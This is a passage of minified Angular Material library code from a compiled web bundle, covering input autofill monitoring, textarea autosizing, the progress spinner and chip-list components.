t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,yu,Pd,$y,Xy,la]}),t})();const kF=ym({passive:!0});let x0e=(()=>{class t{constructor(e,i){this._platform=e,this._ngZone=i,this._monitoredElements=new Map}monitor(e){if(!this._platform.isBrowser)return ua;const i=Gr(e),n=this._monitoredElements.get(i);if(n)return n.subject;const r=new J,c="cdk-text-field-autofilled",d=T=>{"cdk-text-field-autofill-start"!==T.animationName||i.classList.contains(c)?"cdk-text-field-autofill-end"===T.animationName&&i.classList.contains(c)&&(i.classList.remove(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!1}))):(i.classList.add(c),this._ngZone.run(()=>r.next({target:T.target,isAutofilled:!0})))};return this._ngZone.runOutsideAngular(()=>{i.addEventListener("animationstart",d,kF),i.classList.add("cdk-text-field-autofill-monitored")}),this._monitoredElements.set(i,{subject:r,unlisten:()=>{i.removeEventListener("animationstart",d,kF)}}),r}stopMonitoring(e){const i=Gr(e),n=this._monitoredElements.get(i);n&&(n.unlisten(),n.subject.complete(),i.classList.remove("cdk-text-field-autofill-monitored"),i.classList.remove("cdk-text-field-autofilled"),this._monitoredElements.delete(i))}ngOnDestroy(){this._monitoredElements.forEach((e,i)=>this.stopMonitoring(i))}}return t.\u0275fac=function(e){return new(e||t)(At(sr),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Go=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._platform=i,this._ngZone=n,this._destroyed=new J,this._enabled=!0,this._previousMinRows=-1,this._isViewInited=!1,this._handleFocusEvent=c=>{this._hasFocus="focus"===c.type},this._document=r,this._textareaElement=this._elementRef.nativeElement}get minRows(){return this._minRows}set minRows(e){this._minRows=Uo(e),this._setMinHeight()}get maxRows(){return this._maxRows}set maxRows(e){this._maxRows=Uo(e),this._setMaxHeight()}get enabled(){return this._enabled}set enabled(e){e=wi(e),this._enabled!==e&&((this._enabled=e)?this.resizeToFitContent(!0):this.reset())}get placeholder(){return this._textareaElement.placeholder}set placeholder(e){this._cachedPlaceholderHeight=void 0,e?this._textareaElement.setAttribute("placeholder",e):this._textareaElement.removeAttribute("placeholder"),this._cacheTextareaPlaceholderHeight()}_setMinHeight(){const e=this.minRows&&this._cachedLineHeight?this.minRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.minHeight=e)}_setMaxHeight(){const e=this.maxRows&&this._cachedLineHeight?this.maxRows*this._cachedLineHeight+"px":null;e&&(this._textareaElement.style.maxHeight=e)}ngAfterViewInit(){this._platform.isBrowser&&(this._initialHeight=this._textareaElement.style.height,this.resizeToFitContent(),this._ngZone.runOutsideAngular(()=>{Tc(this._getWindow(),"resize").pipe(mw(16),ea(this._destroyed)).subscribe(()=>this.resizeToFitContent(!0)),this._textareaElement.addEventListener("focus",this._handleFocusEvent),this._textareaElement.addEventListener("blur",this._handleFocusEvent)}),this._isViewInited=!0,this.resizeToFitContent(!0))}ngOnDestroy(){this._textareaElement.removeEventListener("focus",this._handleFocusEvent),this._textareaElement.removeEventListener("blur",this._handleFocusEvent),this._destroyed.next(),this._destroyed.complete()}_cacheTextareaLineHeight(){if(this._cachedLineHeight)return;let e=this._textareaElement.cloneNode(!1);e.rows=1,e.style.position="absolute",e.style.visibility="hidden",e.style.border="none",e.style.padding="0",e.style.height="",e.style.minHeight="",e.style.maxHeight="",e.style.overflow="hidden",this._textareaElement.parentNode.appendChild(e),this._cachedLineHeight=e.clientHeight,e.remove(),this._setMinHeight(),this._setMaxHeight()}_measureScrollHeight(){const e=this._textareaElement,i=e.style.marginBottom||"",n=this._platform.FIREFOX,r=n&&this._hasFocus,c=n?"cdk-textarea-autosize-measuring-firefox":"cdk-textarea-autosize-measuring";r&&(e.style.marginBottom=`${e.clientHeight}px`),e.classList.add(c);const d=e.scrollHeight-4;return e.classList.remove(c),r&&(e.style.marginBottom=i),d}_cacheTextareaPlaceholderHeight(){if(!this._isViewInited||null!=this._cachedPlaceholderHeight)return;if(!this.placeholder)return void(this._cachedPlaceholderHeight=0);const e=this._textareaElement.value;this._textareaElement.value=this._textareaElement.placeholder,this._cachedPlaceholderHeight=this._measureScrollHeight(),this._textareaElement.value=e}ngDoCheck(){this._platform.isBrowser&&this.resizeToFitContent()}resizeToFitContent(e=!1){if(!this._enabled||(this._cacheTextareaLineHeight(),this._cacheTextareaPlaceholderHeight(),!this._cachedLineHeight))return;const i=this._elementRef.nativeElement,n=i.value;if(!e&&this._minRows===this._previousMinRows&&n===this._previousValue)return;const r=this._measureScrollHeight(),c=Math.max(r,this._cachedPlaceholderHeight||0);i.style.height=`${c}px`,this._ngZone.runOutsideAngular(()=>{"undefined"!=typeof requestAnimationFrame?requestAnimationFrame(()=>this._scrollToCaretPosition(i)):setTimeout(()=>this._scrollToCaretPosition(i))}),this._previousValue=n,this._previousMinRows=this._minRows}reset(){void 0!==this._initialHeight&&(this._textareaElement.style.height=this._initialHeight)}_noopInputHandler(){}_getDocument(){return this._document||document}_getWindow(){return this._getDocument().defaultView||window}_scrollToCaretPosition(e){const{selectionStart:i,selectionEnd:n}=e;!this._destroyed.isStopped&&this._hasFocus&&e.setSelectionRange(i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(sr),Ee(qi),Ee(ga,8))},t.\u0275dir=Ot({type:t,selectors:[["textarea","cdkTextareaAutosize",""]],hostAttrs:["rows","1",1,"cdk-textarea-autosize"],hostBindings:function(e,i){1&e&&he("input",function(){return i._noopInputHandler()})},inputs:{minRows:["cdkAutosizeMinRows","minRows"],maxRows:["cdkAutosizeMaxRows","maxRows"],enabled:["cdkTextareaAutosize","enabled"],placeholder:"placeholder"},exportAs:["cdkTextareaAutosize"]}),t})(),PF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const c8=new ni("MAT_INPUT_VALUE_ACCESSOR"),w0e=["button","checkbox","file","hidden","image","radio","range","reset","submit"];let I0e=0;const R0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let Xa=(()=>{class t extends R0e{constructor(e,i,n,r,c,d,T,k,q,Y){super(d,r,c,n),this._elementRef=e,this._platform=i,this._autofillMonitor=k,this._formField=Y,this._uid="mat-input-"+I0e++,this.focused=!1,this.stateChanges=new J,this.controlType="mat-input",this.autofilled=!1,this._disabled=!1,this._type="text",this._readonly=!1,this._neverEmptyInputTypes=["date","datetime","datetime-local","month","time","week"].filter(Re=>bz().has(Re)),this._iOSKeyupListener=Re=>{const Fe=Re.target;!Fe.value&&0===Fe.selectionStart&&0===Fe.selectionEnd&&(Fe.setSelectionRange(1,1),Fe.setSelectionRange(0,0))};const te=this._elementRef.nativeElement,pe=te.nodeName.toLowerCase();this._inputValueAccessor=T||te,this._previousNativeValue=this.value,this.id=this.id,i.IOS&&q.runOutsideAngular(()=>{e.nativeElement.addEventListener("keyup",this._iOSKeyupListener)}),this._isServer=!this._platform.isBrowser,this._isNativeSelect="select"===pe,this._isTextarea="textarea"===pe,this._isInFormField=!!Y,this._isNativeSelect&&(this.controlType=te.multiple?"mat-native-select-multiple":"mat-native-select")}get disabled(){return this.ngControl&&null!==this.ngControl.disabled?this.ngControl.disabled:this._disabled}set disabled(e){this._disabled=wi(e),this.focused&&(this.focused=!1,this.stateChanges.next())}get id(){return this._id}set id(e){this._id=e||this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Ad.required))&&void 0!==r&&r}set required(e){this._required=wi(e)}get type(){return this._type}set type(e){this._type=e||"text",this._validateType(),!this._isTextarea&&bz().has(this._type)&&(this._elementRef.nativeElement.type=this._type)}get value(){return this._inputValueAccessor.value}set value(e){e!==this.value&&(this._inputValueAccessor.value=e,this.stateChanges.next())}get readonly(){return this._readonly}set readonly(e){this._readonly=wi(e)}ngAfterViewInit(){this._platform.isBrowser&&this._autofillMonitor.monitor(this._elementRef.nativeElement).subscribe(e=>{this.autofilled=e.isAutofilled,this.stateChanges.next()})}ngOnChanges(){this.stateChanges.next()}ngOnDestroy(){this.stateChanges.complete(),this._platform.isBrowser&&this._autofillMonitor.stopMonitoring(this._elementRef.nativeElement),this._platform.IOS&&this._elementRef.nativeElement.removeEventListener("keyup",this._iOSKeyupListener)}ngDoCheck(){this.ngControl&&this.updateErrorState(),this._dirtyCheckNativeValue(),this._dirtyCheckPlaceholder()}focus(e){this._elementRef.nativeElement.focus(e)}_focusChanged(e){e!==this.focused&&(this.focused=e,this.stateChanges.next())}_onInput(){}_dirtyCheckPlaceholder(){var e;const i=this._formField,n=!i||"legacy"!==i.appearance||null!==(e=i._hasLabel)&&void 0!==e&&e.call(i)?this.placeholder:null;if(n!==this._previousPlaceholder){const r=this._elementRef.nativeElement;this._previousPlaceholder=n,n?r.setAttribute("placeholder",n):r.removeAttribute("placeholder")}}_dirtyCheckNativeValue(){const e=this._elementRef.nativeElement.value;this._previousNativeValue!==e&&(this._previousNativeValue=e,this.stateChanges.next())}_validateType(){w0e.indexOf(this._type)}_isNeverEmpty(){return this._neverEmptyInputTypes.indexOf(this._type)>-1}_isBadInput(){let e=this._elementRef.nativeElement.validity;return e&&e.badInput}get empty(){return!(this._isNeverEmpty()||this._elementRef.nativeElement.value||this._isBadInput()||this.autofilled)}get shouldLabelFloat(){if(this._isNativeSelect){const e=this._elementRef.nativeElement,i=e.options[0];return this.focused||e.multiple||!this.empty||!!(e.selectedIndex>-1&&i&&i.label)}return this.focused||!this.empty}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focused||this.focus()}_isInlineSelect(){const e=this._elementRef.nativeElement;return this._isNativeSelect&&(e.multiple||e.size>1)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(sr),Ee(fm,10),Ee(y1,8),Ee(dg,8),Ee(up),Ee(c8,10),Ee(x0e),Ee(qi),Ee(cb,8))},t.\u0275dir=Ot({type:t,selectors:[["input","matInput",""],["textarea","matInput",""],["select","matNativeControl",""],["input","matNativeControl",""],["textarea","matNativeControl",""]],hostAttrs:[1,"mat-input-element","mat-form-field-autofill-control"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i._focusChanged(!0)})("blur",function(){return i._focusChanged(!1)})("input",function(){return i._onInput()}),2&e&&(Gs("disabled",i.disabled)("required",i.required),Rt("id",i.id)("data-placeholder",i.placeholder)("name",i.name||null)("readonly",i.readonly&&!i._isNativeSelect||null)("aria-invalid",i.empty&&i.required?null:i.errorState)("aria-required",i.required),Ct("mat-input-server",i._isServer)("mat-native-select-inline",i._isInlineSelect()))},inputs:{disabled:"disabled",id:"id",placeholder:"placeholder",name:"name",required:"required",type:"type",errorStateMatcher:"errorStateMatcher",userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],value:"value",readonly:"readonly"},exportAs:["matInput"],features:[ki([{provide:sb,useExisting:t}]),ci,sa]}),t})(),l8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[up],imports:[PF,r8,la,PF,r8]}),t})();function S0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=B(),i=Ti(1);ri("animation-name","mat-progress-spinner-stroke-rotate-"+e._spinnerAnimationLabel)("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}function k0e(t,a){if(1&t&&(fi(),it(0,"circle",4)),2&t){const e=B(),i=Ti(1);ri("stroke-dashoffset",e._getStrokeDashOffset(),"px")("stroke-dasharray",e._getStrokeCircumference(),"px")("stroke-width",e._getCircleStrokeWidth(),"%")("transform-origin",e._getCircleTransformOrigin(i)),Rt("r",e._getCircleRadius())}}const O0e=kd(class{constructor(t){this._elementRef=t}},"primary"),N0e=new ni("mat-progress-spinner-default-options",{providedIn:"root",factory:function L0e(){return{diameter:100}}});class wl extends O0e{constructor(a,e,i,n,r,c,d,T){super(a),this._document=i,this._diameter=100,this._value=0,this._resizeSubscription=I.EMPTY,this.mode="determinate";const k=wl._diameters;this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),k.has(i.head)||k.set(i.head,new Set([100])),this._noopAnimations="NoopAnimations"===n&&!!r&&!r._forceAnimations,"mat-spinner"===a.nativeElement.nodeName.toLowerCase()&&(this.mode="indeterminate"),r&&(r.color&&(this.color=this.defaultColor=r.color),r.diameter&&(this.diameter=r.diameter),r.strokeWidth&&(this.strokeWidth=r.strokeWidth)),e.isBrowser&&e.SAFARI&&d&&c&&T&&(this._resizeSubscription=d.change(150).subscribe(()=>{"indeterminate"===this.mode&&T.run(()=>c.markForCheck())}))}get diameter(){return this._diameter}set diameter(a){this._diameter=Uo(a),this._spinnerAnimationLabel=this._getSpinnerAnimationLabel(),this._styleRoot&&this._attachStyleNode()}get strokeWidth(){return this._strokeWidth||this.diameter/10}set strokeWidth(a){this._strokeWidth=Uo(a)}get value(){return"determinate"===this.mode?this._value:0}set value(a){this._value=Math.max(0,Math.min(100,Uo(a)))}ngOnInit(){const a=this._elementRef.nativeElement;this._styleRoot=_3(a)||this._document.head,this._attachStyleNode(),a.classList.add("mat-progress-spinner-indeterminate-animation")}ngOnDestroy(){this._resizeSubscription.unsubscribe()}_getCircleRadius(){return(this.diameter-10)/2}_getViewBox(){const a=2*this._getCircleRadius()+this.strokeWidth;return`0 0 ${a} ${a}`}_getStrokeCircumference(){return 2*Math.PI*this._getCircleRadius()}_getStrokeDashOffset(){return"determinate"===this.mode?this._getStrokeCircumference()*(100-this._value)/100:null}_getCircleStrokeWidth(){return this.strokeWidth/this.diameter*100}_getCircleTransformOrigin(a){var e;const i=50*(null!==(e=a.currentScale)&&void 0!==e?e:1);return`${i}% ${i}%`}_attachStyleNode(){const a=this._styleRoot,e=this._diameter,i=wl._diameters;let n=i.get(a);if(!n||!n.has(e)){const r=this._document.createElement("style");r.setAttribute("mat-spinner-animation",this._spinnerAnimationLabel),r.textContent=this._getAnimationText(),a.appendChild(r),n||(n=new Set,i.set(a,n)),n.add(e)}}_getAnimationText(){const a=this._getStrokeCircumference();return"\n @keyframes mat-progress-spinner-stroke-rotate-DIAMETER {\n    0%      { stroke-dashoffset: START_VALUE;  transform: rotate(0); }\n    12.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(0); }\n    12.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(72.5deg); }\n    25%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(72.5deg); }\n\n    25.0001%   { stroke-dashoffset: START_VALUE;  transform: rotate(270deg); }\n    37.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(270deg); }\n    37.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(161.5deg); }\n    50%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(161.5deg); }\n\n    50.0001%  { stroke-dashoffset: START_VALUE;  transform: rotate(180deg); }\n    62.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(180deg); }\n    62.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(251.5deg); }\n    75%     { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(251.5deg); }\n\n    75.0001%  { stroke-dashoffset: START_VALUE;  transform: rotate(90deg); }\n    87.5%   { stroke-dashoffset: END_VALUE;    transform: rotate(90deg); }\n    87.5001%  { stroke-dashoffset: END_VALUE;    transform: rotateX(180deg) rotate(341.5deg); }\n    100%    { stroke-dashoffset: START_VALUE;  transform: rotateX(180deg) rotate(341.5deg); }\n  }\n".replace(/START_VALUE/g,""+.95*a).replace(/END_VALUE/g,""+.2*a).replace(/DIAMETER/g,`${this._spinnerAnimationLabel}`)}_getSpinnerAnimationLabel(){return this.diameter.toString().replace(".","_")}}wl._diameters=new WeakMap,wl.\u0275fac=function(a){return new(a||wl)(Ee(mi),Ee(sr),Ee(ga,8),Ee(ir,8),Ee(N0e),Ee(Ma),Ee(bm),Ee(qi))},wl.\u0275cmp=Wt({type:wl,selectors:[["mat-progress-spinner"],["mat-spinner"]],hostAttrs:["role","progressbar","tabindex","-1",1,"mat-progress-spinner","mat-spinner"],hostVars:10,hostBindings:function(a,e){2&a&&(Rt("aria-valuemin","determinate"===e.mode?0:null)("aria-valuemax","determinate"===e.mode?100:null)("aria-valuenow","determinate"===e.mode?e.value:null)("mode",e.mode),ri("width",e.diameter,"px")("height",e.diameter,"px"),Ct("_mat-animation-noopable",e._noopAnimations))},inputs:{color:"color",diameter:"diameter",strokeWidth:"strokeWidth",mode:"mode",value:"value"},exportAs:["matProgressSpinner"],features:[ci],decls:4,vars:8,consts:[["preserveAspectRatio","xMidYMid meet","focusable","false","aria-hidden","true",3,"ngSwitch"],["svg",""],["cx","50%","cy","50%",3,"animation-name","stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%",3,"stroke-dashoffset","stroke-dasharray","stroke-width","transform-origin",4,"ngSwitchCase"],["cx","50%","cy","50%"]],template:function(a,e){1&a&&(fi(),m(0,"svg",0,1),ne(2,S0e,1,11,"circle",2),ne(3,k0e,1,9,"circle",3),u()),2&a&&(ri("width",e.diameter,"px")("height",e.diameter,"px"),V("ngSwitch","indeterminate"===e.mode),Rt("viewBox",e._getViewBox()),C(2),V("ngSwitchCase",!0),C(1),V("ngSwitchCase",!1))},dependencies:[Zf,p1],styles:[".mat-progress-spinner{display:block;position:relative;overflow:hidden}.mat-progress-spinner svg{position:absolute;transform:rotate(-90deg);top:0;left:0;transform-origin:center;overflow:visible}.mat-progress-spinner circle{fill:rgba(0,0,0,0);transition:stroke-dashoffset 225ms linear}.cdk-high-contrast-active .mat-progress-spinner circle{stroke:CanvasText}.mat-progress-spinner[mode=indeterminate] svg{animation:mat-progress-spinner-linear-rotate 2000ms linear infinite}.mat-progress-spinner[mode=indeterminate] circle{transition-property:stroke;animation-duration:4000ms;animation-timing-function:cubic-bezier(0.35, 0, 0.25, 1);animation-iteration-count:infinite}.mat-progress-spinner._mat-animation-noopable svg,.mat-progress-spinner._mat-animation-noopable circle{animation:none;transition:none}@keyframes mat-progress-spinner-linear-rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@keyframes mat-progress-spinner-stroke-rotate-100{0%{stroke-dashoffset:268.606171575px;transform:rotate(0)}12.5%{stroke-dashoffset:56.5486677px;transform:rotate(0)}12.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(72.5deg)}25%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(72.5deg)}25.0001%{stroke-dashoffset:268.606171575px;transform:rotate(270deg)}37.5%{stroke-dashoffset:56.5486677px;transform:rotate(270deg)}37.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(161.5deg)}50%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(161.5deg)}50.0001%{stroke-dashoffset:268.606171575px;transform:rotate(180deg)}62.5%{stroke-dashoffset:56.5486677px;transform:rotate(180deg)}62.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(251.5deg)}75%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(251.5deg)}75.0001%{stroke-dashoffset:268.606171575px;transform:rotate(90deg)}87.5%{stroke-dashoffset:56.5486677px;transform:rotate(90deg)}87.5001%{stroke-dashoffset:56.5486677px;transform:rotateX(180deg) rotate(341.5deg)}100%{stroke-dashoffset:268.606171575px;transform:rotateX(180deg) rotate(341.5deg)}}"],encapsulation:2,changeDetection:0});let OF=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,rn,la]}),t})();const W0e=["*"],NF=new ni("MatChipRemove"),LF=new ni("MatChipAvatar"),zF=new ni("MatChipTrailingIcon");class F0e{constructor(a){this._elementRef=a}}const V0e=mp(kd(Dl(F0e),"primary"),-1);let db=(()=>{class t extends V0e{constructor(e,i,n,r,c,d,T,k){super(e),this._ngZone=i,this._changeDetectorRef=c,this._hasFocus=!1,this.chipListSelectable=!0,this._chipListMultiple=!1,this._chipListDisabled=!1,this.role="option",this._selected=!1,this._selectable=!0,this._disabled=!1,this._removable=!0,this._onFocus=new J,this._onBlur=new J,this.selectionChange=new Tt,this.destroyed=new Tt,this.removed=new Tt,this._addHostClassName(),this._chipRippleTarget=d.createElement("div"),this._chipRippleTarget.classList.add("mat-chip-ripple"),this._elementRef.nativeElement.appendChild(this._chipRippleTarget),this._chipRipple=new DW(this,i,this._chipRippleTarget,n),this._chipRipple.setupTriggerEvents(e),this.rippleConfig=r||{},this._animationsDisabled="NoopAnimations"===T,this.tabIndex=null!=k&&parseInt(k)||-1}get rippleDisabled(){return this.disabled||this.disableRipple||this._animationsDisabled||!!this.rippleConfig.disabled}get selected(){return this._selected}set selected(e){const i=wi(e);i!==this._selected&&(this._selected=i,this._dispatchSelectionChange())}get value(){return void 0!==this._value?this._value:this._elementRef.nativeElement.textContent}set value(e){this._value=e}get selectable(){return this._selectable&&this.chipListSelectable}set selectable(e){this._selectable=wi(e)}get disabled(){return this._chipListDisabled||this._disabled}set disabled(e){this._disabled=wi(e)}get removable(){return this._removable}set removable(e){this._removable=wi(e)}get ariaSelected(){return this.selectable&&(this._chipListMultiple||this.selected)?this.selected.toString():null}_addHostClassName(){const e="mat-basic-chip",i=this._elementRef.nativeElement;i.hasAttribute(e)||i.tagName.toLowerCase()===e?i.classList.add(e):i.classList.add("mat-standard-chip")}ngOnDestroy(){this.destroyed.emit({chip:this}),this._chipRipple._removeTriggerEvents()}select(){this._selected||(this._selected=!0,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}deselect(){this._selected&&(this._selected=!1,this._dispatchSelectionChange(),this._changeDetectorRef.markForCheck())}selectViaInteraction(){this._selected||(this._selected=!0,this._dispatchSelectionChange(!0),this._changeDetectorRef.markForCheck())}toggleSelected(e=!1){return this._selected=!this.selected,this._dispatchSelectionChange(e),this._changeDetectorRef.markForCheck(),this.selected}focus(){this._hasFocus||(this._elementRef.nativeElement.focus(),this._onFocus.next({chip:this})),this._hasFocus=!0}remove(){this.removable&&this.removed.emit({chip:this})}_handleClick(e){this.disabled&&e.preventDefault()}_handleKeydown(e){if(!this.disabled)switch(e.keyCode){case 46:case 8:this.remove(),e.preventDefault();break;case 32:this.selectable&&this.toggleSelected(!0),e.preventDefault()}}_blur(){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._ngZone.run(()=>{this._hasFocus=!1,this._onBlur.next({chip:this})})})}_dispatchSelectionChange(e=!1){this.selectionChange.emit({source:this,isUserInput:e,selected:this._selected})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(sr),Ee(xW,8),Ee(Ma),Ee(ga),Ee(ir,8),Vr("tabindex"))},t.\u0275dir=Ot({type:t,selectors:[["mat-basic-chip"],["","mat-basic-chip",""],["mat-chip"],["","mat-chip",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,LF,5),ha(n,zF,5),ha(n,NF,5)),2&e){let r;Vt(r=Bt())&&(i.avatar=r.first),Vt(r=Bt())&&(i.trailingIcon=r.first),Vt(r=Bt())&&(i.removeIcon=r.first)}},hostAttrs:[1,"mat-chip","mat-focus-indicator"],hostVars:15,hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i.focus()})("blur",function(){return i._blur()}),2&e&&(Rt("tabindex",i.disabled?null:i.tabIndex)("role",i.role)("disabled",i.disabled||null)("aria-disabled",i.disabled.toString())("aria-selected",i.ariaSelected),Ct("mat-chip-selected",i.selected)("mat-chip-with-avatar",i.avatar)("mat-chip-with-trailing-icon",i.trailingIcon||i.removeIcon)("mat-chip-disabled",i.disabled)("_mat-animation-noopable",i._animationsDisabled))},inputs:{color:"color",disableRipple:"disableRipple",tabIndex:"tabIndex",role:"role",selected:"selected",value:"value",selectable:"selectable",disabled:"disabled",removable:"removable"},outputs:{selectionChange:"selectionChange",destroyed:"destroyed",removed:"removed"},exportAs:["matChip"],features:[ci]}),t})(),WF=(()=>{class t{constructor(e,i){this._parentChip=e,"BUTTON"===i.nativeElement.nodeName&&i.nativeElement.setAttribute("type","button")}_handleClick(e){const i=this._parentChip;i.removable&&!i.disabled&&i.remove(),e.stopPropagation(),e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(db),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matChipRemove",""]],hostAttrs:[1,"mat-chip-remove","mat-chip-trailing-icon"],hostBindings:function(e,i){1&e&&he("click",function(r){return i._handleClick(r)})},features:[ki([{provide:NF,useExisting:t}])]}),t})();const FF=new ni("mat-chips-default-options");let U0e=0,VF=(()=>{class t{constructor(e,i){this._elementRef=e,this._defaultOptions=i,this.focused=!1,this._addOnBlur=!1,this.separatorKeyCodes=this._defaultOptions.separatorKeyCodes,this.chipEnd=new Tt,this.placeholder="",this.id="mat-chip-list-input-"+U0e++,this._disabled=!1,this.inputElement=this._elementRef.nativeElement}set chipList(e){e&&(this._chipList=e,this._chipList.registerInput(this))}get addOnBlur(){return this._addOnBlur}set addOnBlur(e){this._addOnBlur=wi(e)}get disabled(){return this._disabled||this._chipList&&this._chipList.disabled}set disabled(e){this._disabled=wi(e)}get empty(){return!this.inputElement.value}ngOnChanges(){this._chipList.stateChanges.next()}ngOnDestroy(){this.chipEnd.complete()}ngAfterContentInit(){this._focusLastChipOnBackspace=this.empty}_keydown(e){if(e){if(9===e.keyCode&&!Zr(e,"shiftKey")&&this._chipList._allowFocusEscape(),8===e.keyCode&&this._focusLastChipOnBackspace)return this._chipList._keyManager.setLastItemActive(),void e.preventDefault();this._focusLastChipOnBackspace=!1}this._emitChipEnd(e)}_keyup(e){!this._focusLastChipOnBackspace&&8===e.keyCode&&this.empty&&(this._focusLastChipOnBackspace=!0,e.preventDefault())}_blur(){this.addOnBlur&&this._emitChipEnd(),this.focused=!1,this._chipList.focused||this._chipList._blur(),this._chipList.stateChanges.next()}_focus(){this.focused=!0,this._focusLastChipOnBackspace=this.empty,this._chipList.stateChanges.next()}_emitChipEnd(e){!this.inputElement.value&&!!e&&this._chipList._keydown(e),(!e||this._isSeparatorKey(e))&&(this.chipEnd.emit({input:this.inputElement,value:this.inputElement.value,chipInput:this}),null==e||e.preventDefault())}_onInput(){this._chipList.stateChanges.next()}focus(e){this.inputElement.focus(e)}clear(){this.inputElement.value="",this._focusLastChipOnBackspace=!0}_isSeparatorKey(e){return!Zr(e)&&new Set(this.separatorKeyCodes).has(e.keyCode)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(FF))},t.\u0275dir=Ot({type:t,selectors:[["input","matChipInputFor",""]],hostAttrs:[1,"mat-chip-input","mat-input-element"],hostVars:5,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._keydown(r)})("keyup",function(r){return i._keyup(r)})("blur",function(){return i._blur()})("focus",function(){return i._focus()})("input",function(){return i._onInput()}),2&e&&(Gs("id",i.id),Rt("disabled",i.disabled||null)("placeholder",i.placeholder||null)("aria-invalid",i._chipList&&i._chipList.ngControl?i._chipList.ngControl.invalid:null)("aria-required",i._chipList&&i._chipList.required||null))},inputs:{chipList:["matChipInputFor","chipList"],addOnBlur:["matChipInputAddOnBlur","addOnBlur"],separatorKeyCodes:["matChipInputSeparatorKeyCodes","separatorKeyCodes"],placeholder:"placeholder",id:"id",disabled:"disabled"},outputs:{chipEnd:"matChipInputTokenEnd"},exportAs:["matChipInput","matChipInputFor"],features:[sa]}),t})();const q0e=Uw(class{constructor(t,a,e,i){this._defaultErrorStateMatcher=t,this._parentForm=a,this._parentFormGroup=e,this.ngControl=i,this.stateChanges=new J}});let G0e=0;class j0e{constructor(a,e){this.source=a,this.value=e}}let m8=(()=>{class t extends q0e{constructor(e,i,n,r,c,d,T){super(d,r,c,T),this._elementRef=e,this._changeDetectorRef=i,this._dir=n,this.controlType="mat-chip-list",this._lastDestroyedChipIndex=null,this._destroyed=new J,this._uid="mat-chip-list-"+G0e++,this._tabIndex=0,this._userTabIndex=null,this._onTouched=()=>{},this._onChange=()=>{},this._multiple=!1,this._compareWith=(k,q)=>k===q,this._disabled=!1,this.ariaOrientation="horizontal",this._selectable=!0,this.change=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this)}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get role(){return this._explicitRole?this._explicitRole:this.empty?null:"listbox"}set role(e){this._explicitRole=e}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._syncChipsState()}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this.writeValue(e),this._value=e}get id(){return this._chipInput?this._chipInput.id:this._uid}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Ad.required))&&void 0!==r&&r}set 